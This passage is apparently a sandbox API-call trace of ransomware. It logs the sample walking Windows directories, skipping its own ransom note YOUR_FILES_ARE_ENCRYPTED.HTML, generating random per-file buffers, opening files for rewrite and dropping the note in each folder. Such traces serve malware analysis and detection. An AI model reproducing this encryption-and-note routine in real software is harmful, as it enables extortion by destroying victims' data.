(in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5c6e87, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae5c6e87, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5cf7b5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.892] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0109.892] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0109.892] GetProcessHeap () returned 0x600000 [0109.892] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0109.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.892] GetProcessHeap () returned 0x600000 [0109.893] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0109.893] GetProcessHeap () returned 0x600000 [0109.893] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.893] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0109.893] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.894] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0109.894] GetProcessHeap () returned 0x600000 [0109.894] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.894] GetProcessHeap () returned 0x600000 [0109.894] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.894] GetProcessHeap () returned 0x600000 [0109.894] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.894] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Task", cAlternateFileName="")) returned 1 [0109.895] StrStrIW (lpFirst="Task", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.895] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned 50 [0109.895] GetProcessHeap () returned 0x600000 [0109.895] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.895] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" [0109.895] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*" [0109.895] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae63fc23, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.896] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae63fc23, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName="..", cAlternateFileName="")) returned 1 [0109.896] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae63c1bd, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae63c1bd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae643747, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.896] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0109.896] StrStrIW (lpFirst="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.896] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 89 [0109.896] GetProcessHeap () returned 0x600000 [0109.896] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.897] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0109.897] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*" [0109.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xae6066c7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0109.897] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xae6066c7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="..", cAlternateFileName="")) returned 1 [0109.897] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="en-US", cAlternateFileName="")) returned 1 [0109.897] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.897] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 95 [0109.897] GetProcessHeap () returned 0x600000 [0109.897] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0109.898] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0109.898] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*" [0109.898] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xae5f5525, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0109.898] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xae5f5525, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName="..", cAlternateFileName="")) returned 1 [0109.898] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9eb0c2e2, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9eb0c2e2, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9eb0c2e2, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0109.898] StrStrIW (lpFirst="resource.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.898] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 108 [0109.898] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0109.898] lstrlenW (lpString=".xml") returned 4 [0109.898] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0109.898] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0109.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.898] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f5525, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae5f5525, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5fa2ed, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.898] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f5525, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae5f5525, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5fa2ed, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.898] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0109.899] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0109.899] GetProcessHeap () returned 0x600000 [0109.899] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3185df0 [0109.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.899] GetProcessHeap () returned 0x600000 [0109.899] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3185df0 | out: hHeap=0x600000) returned 1 [0109.899] GetProcessHeap () returned 0x600000 [0109.899] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0109.900] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0109.900] StrStrIW (lpFirst="folder.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.900] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 100 [0109.900] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0109.900] lstrlenW (lpString=".ico") returned 4 [0109.900] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0109.900] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="netfol.ico", cAlternateFileName="")) returned 1 [0109.900] StrStrIW (lpFirst="netfol.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.900] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 100 [0109.900] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0109.900] lstrlenW (lpString=".ico") returned 4 [0109.900] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0109.900] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="pictures.ico", cAlternateFileName="")) returned 1 [0109.900] StrStrIW (lpFirst="pictures.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.900] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 102 [0109.900] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0109.900] lstrlenW (lpString=".ico") returned 4 [0109.900] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0109.900] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0109.900] StrStrIW (lpFirst="resource.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.900] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 102 [0109.900] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0109.900] lstrlenW (lpString=".xml") returned 4 [0109.900] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0109.900] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0109.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.901] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="ringtones.ico", cAlternateFileName="")) returned 1 [0109.901] StrStrIW (lpFirst="ringtones.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.901] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 103 [0109.901] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0109.901] lstrlenW (lpString=".ico") returned 4 [0109.901] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0109.901] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="settings.ico", cAlternateFileName="")) returned 1 [0109.901] StrStrIW (lpFirst="settings.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.901] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 102 [0109.901] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0109.901] lstrlenW (lpString=".ico") returned 4 [0109.901] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0109.901] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="sync.ico", cAlternateFileName="")) returned 1 [0109.901] StrStrIW (lpFirst="sync.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.901] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 98 [0109.901] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0109.901] lstrlenW (lpString=".ico") returned 4 [0109.901] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0109.901] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2aff, dwReserved0=0x318f948, dwReserved1=0x63c1b0, 